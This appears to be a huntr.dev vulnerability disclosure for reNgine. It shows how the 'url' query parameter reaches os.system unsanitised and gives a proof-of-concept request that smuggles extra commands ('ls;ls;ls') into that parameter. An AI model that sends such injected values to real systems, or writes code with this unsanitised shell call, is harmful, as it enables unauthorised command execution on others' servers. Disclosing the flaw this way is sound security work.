# Description
Hello , its my first report in huntr.dev
fast code review :
file https://github.com/yogeshojha/rengine/blob/master/web/api/views.py#L820
“`
class CMSDetector(APIView):
def get(self, request):
req = self.request
url = req.query_params.get(‘url’)
#save_db = True if ‘save_db’ in req.query_params else False
response = {‘status’: False}
try:
response = get_cms_details(url)
except Exception as e:
response = {‘status’: False, ‘message’: str(e)}
return Response(response)
“`
param : url
file 2 :
https://github.com/yogeshojha/rengine/blob/master/web/reNgine/common_func.py#L668
“`
def get_cms_details(url):
# this function will fetch cms details using cms_detector
response = {}
cms_detector_command = ‘python3 /usr/src/github/CMSeeK/cmseek.py -u {} –random-agent –batch –follow-redirect’.format(url)
os.system(cms_detector_command)
response[‘status’] = False
response[‘message’] = ‘Could not detect CMS!’
parsed_url = urlparse(url)
domain_name = parsed_url.hostname
port = parsed_url.port
find_dir = domain_name
if port:
find_dir += ‘_{}’.format(port)
print(url)
print(find_dir)
“`
# Proof of Concept
“`
https:///api/tools/cms_detector/?format=json&url=ls;ls;ls
“`